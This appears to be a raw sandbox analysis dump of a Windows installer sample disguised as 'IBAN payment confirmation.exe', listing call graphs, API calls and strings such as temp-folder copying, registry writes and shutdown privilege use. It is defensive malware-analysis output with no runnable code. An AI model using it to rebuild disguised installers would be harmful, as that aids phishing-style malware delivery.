MultiByteToWideChar 4676->4678 4680 100024fd lstrcpynW 4676->4680 4681 100024ec StringFromGUID2 4676->4681 4682 10001280 2 API calls 4676->4682 4727 1000121b GlobalAlloc 4676->4727 4728 100012f3 4676->4728 4677->4676 4678->4676 4684 100015cc 4679->4684 4680->4676 4681->4676 4682->4676 4732 1000121b GlobalAlloc 4684->4732 4686 100015d2 4687 100015df lstrcpyW 4686->4687 4689 100015f9 4686->4689 4690 10001613 4687->4690 4689->4690 4691 100015fe wsprintfW 4689->4691 4692 10001280 4690->4692 4691->4690 4693 100012c3 GlobalFree 4692->4693 4694 10001289 GlobalAlloc lstrcpynW 4692->4694 4693->4593 4694->4693 4696 1000245e 4695->4696 4698 10001879 4695->4698 4697 1000247a GlobalFree 4696->4697 4696->4698 4697->4696 4698->4604 4698->4606 4700 10001280 2 API calls 4699->4700 4701 10001576 4700->4701 4701->4598 4702->4609 4703->4611 4705 1000127c 4704->4705 4706 1000124d 4704->4706 4705->4638 4706->4705 4717 1000121b GlobalAlloc 4706->4717 4708 10001259 lstrcpyW GlobalFree 4708->4638 4710 100015c5 4709->4710 4710->4633 4718 1000121b GlobalAlloc 4711->4718 4713 1000123b lstrcpynW 4713->4628 4714->4638 4715->4629 4716->4635 4717->4708 4718->4713 4720 100012ee 4719->4720 4721 100012d0 4719->4721 4720->4720 4721->4720 4722 1000122c 2 API calls 4721->4722 4723 100012ec 4722->4723 4723->4648 4725 10002603 4724->4725 4726 100025ad VirtualAlloc 4724->4726 4725->4651 4726->4725 4727->4676 4729 10001324 4728->4729 4730 100012fc 4728->4730 4729->4676 4730->4729 4731 10001308 lstrcpyW 4730->4731 4731->4729 4732->4686 5506 10001058 5507 10001243 3 API calls 5506->5507 5509 10001074 5507->5509 5508 100010dd 5509->5508 5510 1000152e 4 API calls 5509->5510 5511 10001092 5509->5511 5510->5511 5512 1000152e 4 API calls 5511->5512 5513 100010a2 5512->5513 5514 100010b2 5513->5514 5515 100010a9 GlobalSize 5513->5515 5516 100010b6 GlobalAlloc 5514->5516 5517 100010c7 5514->5517 5515->5514 5518 10001555 3 API calls 5516->5518 5519 100010d2 GlobalFree 5517->5519 5518->5517 5519->5508 5520 40159b 5521 402b3a 18 API calls 5520->5521 5522 4015a2 SetFileAttributesW 5521->5522 5523 4015b4 5522->5523 5524 40149e 5525 4014ac PostQuitMessage 5524->5525 5526 40223e 5524->5526 5525->5526 5527 4021a0 5528 402b3a 18 API calls 5527->5528 5529 4021a6 5528->5529 5530 402b3a 18 API calls 5529->5530 5531 4021af 5530->5531 5532 402b3a 18 API calls 5531->5532 5533 4021b8 5532->5533 5534 40622d 2 API calls 5533->5534 5535 4021c1 5534->5535 5536 4021d2 lstrlenW lstrlenW 5535->5536 5537 4021c5 5535->5537 5539 405194 25 API calls 5536->5539 5538 405194 25 API calls 5537->5538 5541 4021cd 5537->5541 5538->5541 5540 402210 SHFileOperationW 5539->5540 5540->5537 5540->5541 5542 100010e1 5543 10001111 5542->5543 5544 10001243 3 API calls 5543->5544 5554 10001121 5544->5554 5545 100011d8 GlobalFree 5546 100012c8 2 API calls 5546->5554 5547 100011d3 5547->5545 5548 10001243 3 API calls 5548->5554 5549 10001280 2 API calls 5552 100011c4 GlobalFree 5549->5552 5550 10001164 GlobalAlloc 5550->5554 5551 100011f8 GlobalFree 5551->5554 5552->5554 5553 100012f3 lstrcpyW 5553->5554 5554->5545 5554->5546 5554->5547 5554->5548 5554->5549 5554->5550 5554->5551 5554->5552 5554->5553 3966 401b22 3967 401b73 3966->3967 3968 401b2f 3966->3968 3970 401b78 3967->3970 3971 401b9d GlobalAlloc 3967->3971 3969 401bb8 3968->3969 3974 401b46 3968->3974 3973 405f0c 18 API calls 3969->3973 3982 40223e 3969->3982 3970->3982 3987 405eea lstrcpynW 3970->3987 3972 405f0c 18 API calls 3971->3972 3972->3969 3975 402238 3973->3975 3985 405eea lstrcpynW 3974->3985 3988 4056c6 3975->3988 3978 401b8a GlobalFree 3978->3982 3979 401b55 3986 405eea lstrcpynW 3979->3986 3983 401b64 3992 405eea lstrcpynW 3983->3992 3985->3979 3986->3983 3987->3978 3989 4056db 3988->3989 3990 405727 3989->3990 3991 4056ef MessageBoxIndirectW 3989->3991 3990->3982 3991->3990 3992->3982 5555 4029a2 SendMessageW 5556 4029c7 5555->5556 5557 4029bc InvalidateRect 5555->5557 5557->5556 3993 401924 3994 401926 3993->3994 3995 402b3a 18 API calls 3994->3995 3996 40192b 3995->3996 3999 405772 3996->3999 4038 405a3d 3999->4038 4002 4057b1 4009 4058d1 4002->4009 4052 405eea lstrcpynW 4002->4052 4003 40579a DeleteFileW 4004 401934 4003->4004 4006 4057d7 4007 4057ea 4006->4007 4008 4057dd lstrcatW 4006->4008 4053 405981 lstrlenW 4007->4053 4011 4057f0 4008->4011 4009->4004 4082 40622d FindFirstFileW 4009->4082 4014 405800 lstrcatW 4011->4014 4015 40580b lstrlenW FindFirstFileW 4011->4015 4014->4015 4015->4009 4023 40582d 4015->4023 4016 4058fa 4085 405935 lstrlenW CharPrevW 4016->4085 4019 4058b4 FindNextFileW 4019->4023 4024 4058ca FindClose 4019->4024 4020 40572a 5 API calls 4022 40590c 4020->4022 4025 405910 4022->4025 4026 405926 4022->4026 4023->4019 4032 405875 4023->4032 4057 405eea lstrcpynW 4023->4057 4024->4009 4025->4004 4029 405194 25 API calls 4025->4029 4028 405194 25 API calls 4026->4028 4028->4004 4031 40591d 4029->4031 4030 405772 64 API calls 4030->4032 4034 405d84 40 API calls 4031->4034 4032->4019 4032->4030 4033 405194 25 API calls 4032->4033 4058 40572a 4032->4058 4066 405194 4032->4066 4077 405d84 4032->4077 4033->4019 4036 405924 4034->4036 4036->4004 4088 405eea lstrcpynW 4038->4088 4040 405a4e 4089 4059e0 CharNextW CharNextW 4040->4089 4043 405792 4043->4002 4043->4003 4044 40617e 5 API calls 4050 405a64 4044->4050 4045 405a95 lstrlenW 4046 405aa0 4045->4046 4045->4050 4048 405935 3 API calls 4046->4048 4047 40622d 2 API calls 4047->4050 4049 405aa5 GetFileAttributesW 4048->4049 4049->4043 4050->4043 4050->4045 4050->4047 4051 405981 2 API calls 4050->4051 4051->4045 4052->4006 4054 40598f 4053->4054 4055 4059a1 4054->4055 4056 405995 CharPrevW 4054->4056 4055->4011 4056->4054 4056->4055 4057->4023 4095 405b31 GetFileAttributesW 4058->4095 4061 405745 RemoveDirectoryW 4063 405753 4061->4063 4062 40574d DeleteFileW 4062->4063 4064 405757 4063->4064 4065 405763 SetFileAttributesW 4063->4065 4064->4032 4065->4064 4067 405251 4066->4067 4068 4051af 4066->4068 4067->4032 4069 4051cb lstrlenW 4068->4069 4070 405f0c 18 API calls 4068->4070 4071 4051f4 4069->4071 4072 4051d9 lstrlenW 4069->4072 4070->4069 4074 405207 4071->4074 4075 4051fa SetWindowTextW 4071->4075 4072->4067 4073 4051eb lstrcatW 4072->4073 4073->4071 4074->4067 4076 40520d SendMessageW SendMessageW SendMessageW 4074->4076 4075->4074 4076->4067 4098 406254 GetModuleHandleA 4077->4098 4081 405dac 4081->4032 4083 406243 FindClose 4082->4083 4084 4058f6 4082->4084 4083->4084 4084->4004 4084->4016 4086 405951 lstrcatW 4085->4086 4087 405900 4085->4087 4086->4087 4087->4020 4088->4040 4090 4059fd 4089->4090 4093 405a0f 4089->4093 4092 405a0a CharNextW 4090->4092 4090->4093 4091 405a33 4091->4043 4091->4044 4092->4091 4093->4091 4094 405962 CharNextW 4093->4094 4094->4093 4096 405736 4095->4096 4097 405b43 SetFileAttributesW 4095->4097 4096->4061 4096->4062 4096->4064 4097->4096 4099 406270 LoadLibraryA 4098->4099 4100 40627b GetProcAddress 4098->4100 4099->4100 4101 405d8b 4099->4101 4100->4101 4101->4081 4102 405c08 lstrcpyW 4101->4102 4103 405c31 4102->4103 4104 405c57 GetShortPathNameW 4102->4104 4127 405b56 GetFileAttributesW CreateFileW 4103->4127 4105 405c6c 4104->4105 4106 405d7e 4104->4106 4105->4106 4108 405c74 wsprintfA 4105->4108 4106->4081 4111 405f0c 18 API calls 4108->4111 4109 405c3b CloseHandle GetShortPathNameW 4109->4106 4110 405c4f 4109->4110 4110->4104 4110->4106 4112 405c9c 4111->4112 4128 405b56 GetFileAttributesW CreateFileW 4112->4128 4114 405ca9 4114->4106 4115 405cb8 GetFileSize GlobalAlloc 4114->4115 4116 405d77 CloseHandle 4115->4116 4117 405cda 4115->4117 4116->4106 4129 405bd9 ReadFile 4117->4129 4122 405cf9 lstrcpyA 4125 405d1b 4122->4125 4123 405d0d 4124 405abb 4 API calls 4123->4124 4124->4125 4126 405d52 SetFilePointer WriteFile GlobalFree 4125->4126 4126->4116 4127->4109 4128->4114 4130 405bf7 4129->4130 4130->4116 4131 405abb lstrlenA 4130->4131 4132 405afc lstrlenA 4131->4132 4133 405b04 4132->4133 4134 405ad5 lstrcmpiA 4132->4134 4133->4122 4133->4123 4134->4133 4135 405af3 CharNextA 4134->4135 4135->4132 5565 402224 5566 40223e 5565->5566 5567 40222b 5565->5567 5568 405f0c 18 API calls 5567->5568 5569 402238 5568->5569 5570 4056c6 MessageBoxIndirectW 5569->5570 5570->5566 5571 10001667 5572 1000152e 4 API calls 5571->5572 5575 1000167f 5572->5575 5573 100016c5 GlobalFree 5574 1000169a 5574->5573 5575->5573 5575->5574 5576 100016b1 VirtualFree 5575->5576 5576->5573 5577 402729 5578 402730 5577->5578 5579 4029c7 5577->5579 5580 402736 FindClose 5578->5580 5580->5579 5581 401cab 5582 402b1d 18 API calls 5581->5582 5583 401cb2 5582->5583 5584 402b1d 18 API calls 5583->5584 5585 401cba GetDlgItem 5584->5585 5586 4024e8 5585->5586 5587 4016af 5588 402b3a 18 API calls 5587->5588 5589 4016b5 GetFullPathNameW 5588->5589 5590 4016cf 5589->5590 5596 4016f1 5589->5596 5593 40622d 2 API calls 5590->5593 5590->5596 5591 401706 GetShortPathNameW 5592 4029c7 5591->5592 5594 4016e1 5593->5594 5594->5596 5597 405eea lstrcpynW 5594->5597 5596->5591 5596->5592 5597->5596 4319 402331 4320 402337 4319->4320 4321 402b3a 18 API calls 4320->4321 4322 402349 4321->4322 4323 402b3a 18 API calls 4322->4323 4324 402353 RegCreateKeyExW 4323->4324 4325 40237d 4324->4325 4327 402793 4324->4327 4326 402398 4325->4326 4328 402b3a 18 API calls 4325->4328 4329 402b1d 18 API calls 4326->4329 4332 4023a4 4326->4332 4331 40238e lstrlenW 4328->4331 4329->4332 4330 4023bf RegSetValueExW 4334 4023d5 RegCloseKey 4330->4334 4331->4326 4332->4330 4336 403062 4332->4336 4334->4327 4337 403072 SetFilePointer 4336->4337 4338 40308e 4336->4338 4337->4338 4351 40317d GetTickCount 4338->4351 4341 405bd9 ReadFile 4342 4030ae 4341->4342 4343 40317d 43 API calls 4342->4343 4347 403139 4342->4347 4344 4030c5 4343->4344 4345 40313f ReadFile 4344->4345 4344->4347 4348 4030d5 4344->4348 4345->4347 4347->4330 4348->4347 4349 405bd9 ReadFile 4348->4349 4350 403108 WriteFile 4348->4350 4349->4348 4350->4347 4350->4348 4352 4032e7 4351->4352 4353 4031ac 4351->4353 4354 402d1a 33 API calls 4352->4354 4364 40330f SetFilePointer 4353->4364 4360 403095 4354->4360 4356 4031b7 SetFilePointer 4362 4031dc 4356->4362 4360->4341 4360->4347 4361 403271 WriteFile 4361->4360 4361->4362 4362->4360 4362->4361 4363 4032c8 SetFilePointer 4362->4363 4365 4032f9 4362->4365 4368 406390 4362->4368 4375 402d1a 4362->4375 4363->4352 4364->4356 4366 405bd9 ReadFile 4365->4366 4367 40330c 4366->4367 4367->4362 4369 4063b5 4368->4369 4370 4063bd 4368->4370 4369->4362 4370->4369 4371 406444 GlobalFree 4370->4371 4372 40644d GlobalAlloc 4370->4372 4373 4064c4 GlobalAlloc 4370->4373 4374 4064bb GlobalFree 4370->4374 4371->4372 4372->4369 4372->4370 4373->4369 4373->4370 4374->4373 4376 402d43 4375->4376 4377 402d2b 4375->4377 4379 402d53 GetTickCount 4376->4379 4380 402d4b 4376->4380 4378 402d34 DestroyWindow 4377->4378 4383 402d3b 4377->4383 4378->4383 4382 402d61 4379->4382 4379->4383 4381 40628d 2 API calls 4380->4381 4381->4383 4384 402d96 CreateDialogParamW ShowWindow 4382->4384 4385 402d69 4382->4385 4383->4362 4384->4383 4385->4383 4390 402cfe 4385->4390 4387 402d77 wsprintfW 4388 405194 25 API calls 4387->4388 4389 402d94 4388->4389 4389->4383 4391 402d0d 4390->4391 4392 402d0f MulDiv 4390->4392 4391->4392 4392->4387 5605 4027b5 5606 402b3a 18 API calls 5605->5606 5607 4027c3 5606->5607 5608 4027d9 5607->5608 5609 402b3a 18 API calls 5607->5609 5610 405b31 2 API calls 5608->5610 5609->5608 5611 4027df 5610->5611 5631 405b56 GetFileAttributesW CreateFileW 5611->5631 5613 4027ec 5614 402895 5613->5614 5615 4027f8 GlobalAlloc 5613->5615 5618 4028b0 5614->5618 5619 40289d DeleteFileW 5614->5619 5616 402811 5615->5616 5617 40288c CloseHandle 5615->5617 5632 40330f SetFilePointer 5616->5632 5617->5614 5619->5618 5621 402817 5622 4032f9 ReadFile 5621->5622 5623 402820 GlobalAlloc 5622->5623 5624 402830 5623->5624 5625 402864 WriteFile GlobalFree 5623->5625 5627 403062 46 API calls 5624->5627 5626 403062 46 API calls 5625->5626 5628 402889 5626->5628 5630 40283d 5627->5630 5628->5617 5629 40285b GlobalFree 5629->5625 5630->5629 5631->5613 5632->5621 5633 4028b6 5634 402b1d 18 API calls 5633->5634 5635 4028bc 5634->5635 5636 4028f8 5635->5636 5637 4028df 5635->5637 5643 402793 5635->5643 5639 402902 5636->5639 5640 40290e 5636->5640 5638 4028e4 5637->5638 5646 4028f5 5637->5646 5647 405eea lstrcpynW 5638->5647 5641 402b1d 18 API calls 5639->5641 5642 405f0c 18 API calls 5640->5642 5641->5646 5642->5646 5646->5643 5648 405e31 wsprintfW 5646->5648 5647->5643 5648->5643 5649 4014b8 5650 4014be 5649->5650 5651 401389 2 API calls 5650->5651 5652 4014c6 5651->5652 4742 4015b9 4743 402b3a 18 API calls 4742->4743 4744 4015c0 4743->4744 4745 4059e0 4 API calls 4744->4745 4756 4015c9 4745->4756 4746 401614 4748 401646 4746->4748 4749 401619 4746->4749 4747 405962 CharNextW 4750 4015d7 CreateDirectoryW 4747->4750 4753 401423 25 API calls 4748->4753 4751 401423 25 API calls 4749->4751 4752 4015ed GetLastError 4750->4752 4750->4756 4754 401620 4751->4754 4752->4756 4757 4015fa GetFileAttributesW 4752->4757 4759 40163e 4753->4759 4760 405eea lstrcpynW 4754->4760 4756->4746 4756->4747 4757->4756 4758 40162d SetCurrentDirectoryW 4758->4759 4760->4758 5653 401939 5654 402b3a 18 API calls 5653->5654 5655 401940 lstrlenW 5654->5655 5656 4024e8 5655->5656 5657 40293b 5658 402b1d 18 API calls 5657->5658 5659 402941 5658->5659 5660 402974 5659->5660 5661 402793 5659->5661 5663 40294f 5659->5663 5660->5661 5662 405f0c 18 API calls 5660->5662 5662->5661 5663->5661 5665 405e31 wsprintfW 5663->5665 5665->5661 4974 40173f 4975 402b3a 18 API calls 4974->4975 4976 401746 4975->4976 4977 405b85 2 API calls 4976->4977 4978 40174d 4977->4978 4979 405b85 2 API calls 4978->4979 4979->4978 5666 40653f 5672 4063c3 5666->5672 5667 406d2e 5668 406444 GlobalFree 5669 40644d GlobalAlloc 5668->5669 5669->5667 5669->5672 5670 4064c4 GlobalAlloc 5670->5667 5670->5672 5671 4064bb GlobalFree 5671->5670 5672->5667 5672->5668 5672->5669 5672->5670 5672->5671

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 30 403470-403486 26->30 31 40349c-4034b2 26->31 28 403448-40344b 27->28 29 40344d 27->29 28->26 28->29 29->26 30->31 35 403488-403490 30->35 31->22 37 4034b4-4034c9 31->37 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->31 40->41 41->31 42->24 42->44 43->16 57 403631-403641 call 4056c6 ExitProcess 44->57 58 403727-40372d 44->58 49 403594-40359f call 405962 45->49 50 40360c-403613 call 4038b4 45->50 59 4035a1-4035b2 49->59 60 4035d6-4035e0 49->60 56 403618 50->56 56->44 62 4037aa-4037b2 58->62 63 40372f-40374c call 406254 * 3 58->63 65 4035b4-4035b6 59->65 68 4035e2-4035f0 call 405a3d 60->68 69 403647-403661 lstrcatW lstrcmpiW 60->69 66 4037b4 62->66 67 4037b8-4037bc ExitProcess 62->67 90 403796-4037a1 ExitWindowsEx 63->90 91 40374e-403750 63->91 72 4035d0-4035d4 65->72 73 4035b8-4035ce 65->73 66->67 68->44 81 4035f2-403608 call 405eea * 2 68->81 69->44 75 403663-403679 CreateDirectoryW SetCurrentDirectoryW 69->75 72->60 72->65 73->60 73->72 78 403686-4036af call 405eea 75->78 79 40367b-403681 call 405eea 75->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->50 99 403711-403719 89->99 100 4036d2-4036e2 CopyFileW 89->100 90->62 94 4037a3-4037a5 call 40140b 90->94 91->90 96 403752-403754 91->96 94->62 96->90 101 403756-403768 GetCurrentProcess 96->101 99->89 103 40371b-403722 call 405d84 99->103 100->99 102 4036e4-403704 call 405d84 call 405f0c call 405665 100->102 101->90 108 40376a-40378c 101->108 102->99 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->99
                                                                                                                              APIs
                                                                                                                              • #17.COMCTL32 ref: 00403379
                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                              • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                              • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe",00000000), ref: 004033DB
                                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe",00000020), ref: 00403402
                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040355D
                                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                                              • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                              • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\IBAN payment confirmation.exe",00000000,?), ref: 0040364D
                                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\IBAN payment confirmation.exe",00000000,?), ref: 00403659
                                                                                                                              • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 0040366C
                                                                                                                              • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\IBAN payment confirmation.exe,0041FE90,00000001), ref: 004036DA
                                                                                                                              • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                              • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                              • String ID: "C:\Users\user\Desktop\IBAN payment confirmation.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr$C:\Users\user\Desktop$C:\Users\user\Desktop\IBAN payment confirmation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                              • API String ID: 4107622049-1558679116
                                                                                                                              • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                              • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                              • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                              • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 129 404e93-404e9a 125->129 132 404dc4-404dcb 126->132 133 404db7-404dbe 126->133 130 404c20-404c3d call 405f0c SendMessageW * 2 127->130 131 404c1d 127->131 128->124 134 404c45-404c71 call 40412f * 2 128->134 135 404f0b-404f13 129->135 136 404e9c-404ea2 129->136 130->128 131->130 138 404e40-404e43 132->138 139 404dcd-404dd0 132->139 133->129 133->132 170 404c77-404c7d 134->170 171 404d3c-404d4f GetWindowLongW SetWindowLongW 134->171 144 404f15-404f1b SendMessageW 135->144 145 404f1d-404f24 135->145 141 4050f3-405105 call 404196 136->141 142 404ea8-404eb2 136->142 138->129 143 404e45-404e4f 138->143 147 404dd2-404dd9 139->147 148 404ddb-404df0 call 404a5e 139->148 142->141 151 404eb8-404ec7 SendMessageW 142->151 153 404e51-404e5d SendMessageW 143->153 154 404e5f-404e69 143->154 144->145 155 404f26-404f2d 145->155 156 404f58-404f5f 145->156 147->138 147->148 148->138 169 404df2-404e03 148->169 151->141 161 404ecd-404ede SendMessageW 151->161 153->154 154->129 163 404e6b-404e75 154->163 164 404f36-404f3d 155->164 165 404f2f-404f30 ImageList_Destroy 155->165 159 4050b5-4050bc 156->159 160 404f65-404f71 call 4011ef 156->160 159->141 175 4050be-4050c5 159->175 188 404f81-404f84 160->188 189 404f73-404f76 160->189 173 404ee0-404ee6 161->173 174 404ee8-404eea 161->174 176 404e86-404e90 163->176 177 404e77-404e84 163->177 167 404f46-404f52 164->167 168 404f3f-404f40 GlobalFree 164->168 165->164 167->156 168->167 169->138 178 404e05-404e07 169->178 179 404c80-404c87 170->179 183 404d55-404d59 171->183 173->174 181 404eeb-404f04 call 401299 SendMessageW 173->181 174->181 175->141 182 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 175->182 176->129 177->129 184 404e09-404e10 178->184 185 404e1a 178->185 186 404d1d-404d30 179->186 187 404c8d-404cb5 179->187 181->135 182->141 191 404d73-404d7b call 404164 183->191 192 404d5b-404d6e ShowWindow call 404164 183->192 194 404e12-404e14 184->194 195 404e16-404e18 184->195 198 404e1d-404e39 call 40117d 185->198 186->179 202 404d36-404d3a 186->202 196 404cb7-404ced SendMessageW 187->196 197 404cef-404cf1 187->197 203 404fc5-404fe9 call 4011ef 188->203 204 404f86-404f9f call 4012e2 call 401299 188->204 199 404f78 189->199 200 404f79-404f7c call 404ade 189->200 191->118 192->141 194->198 195->198 196->186 206 404cf3-404d02 SendMessageW 197->206 207 404d04-404d1a SendMessageW 197->207 198->138 199->200 200->188 202->171 202->183 218 40508b-40509f InvalidateRect 203->218 219 404fef 203->219 224 404fa1-404fa7 204->224 225 404faf-404fbe SendMessageW 204->225 206->186 207->186 218->159 220 4050a1-4050b0 call 404a31 call 404978 218->220 221 404ff2-404ffd 219->221 220->159 226 405073-405085 221->226 227 404fff-40500e 221->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->203 226->218 226->221 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 234 405026-405029 232->234 235 40502b-405034 232->235 236 405039-405071 SendMessageW * 2 234->236 235->236 237 405036 235->237 236->226 237->236
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C06
